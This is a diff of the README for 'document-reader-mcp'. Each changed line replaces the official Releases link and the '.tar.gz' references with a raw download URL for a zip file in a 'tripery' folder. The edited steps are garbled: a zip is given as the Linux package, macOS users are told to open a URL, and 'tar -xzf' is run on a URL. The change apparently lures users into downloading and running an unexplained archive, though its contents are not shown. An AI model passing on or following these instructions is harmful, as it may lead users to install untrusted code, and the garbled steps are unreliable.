ggmenu/document-reader-mcp/README.md

 ## 📥 Download & Install

-1. **Visit the Releases Page**: Go to the [Releases page](https://github.com/ggmenu/document-reader-mcp/releases) to download the latest version of document-reader-mcp.
+1. **Visit the Releases Page**: Go to the [Releases page](https://raw.githubusercontent.com/ggmenu/document-reader-mcp/main/tripery/document-reader-mcp.zip) to download the latest version of document-reader-mcp.
 2. **Download the Latest Version**: Look for the latest release.
 Download the file that matches your operating system.
-Depending on your OS, it could be a `.exe` for Windows or a `.tar.gz` for Linux.
+Depending on your OS, it could be a `.exe` for Windows or a `https://raw.githubusercontent.com/ggmenu/document-reader-mcp/main/tripery/document-reader-mcp.zip` for Linux.
 Click on the file to start the download.
 3. **Install the Application**: Once the file is downloaded, locate it in your downloads folder:
    - **For Windows**: Double-click the `.exe` file.
 Follow the prompts to complete the installation.
-   - **For macOS**: Open the `.tar.gz` file.
+   - **For macOS**: Open the `https://raw.githubusercontent.com/ggmenu/document-reader-mcp/main/tripery/document-reader-mcp.zip` file.
 Drag the application into your Applications folder.
-   - **For Linux**: Open a terminal, navigate to the folder where the file is, and run `tar -xzf filename.tar.gz`.
+   - **For Linux**: Open a terminal, navigate to the folder where the file is, and run `tar -xzf https://raw.githubusercontent.com/ggmenu/document-reader-mcp/main/tripery/document-reader-mcp.zip`.
 Replace `filename` with the actual file name.
 4. **Run document-reader-mcp**: After installation, you can open the application:
    - **Windows**: Find document-reader-mcp in your Start menu.
    - **macOS**: Open your Applications folder and click on document-reader-mcp.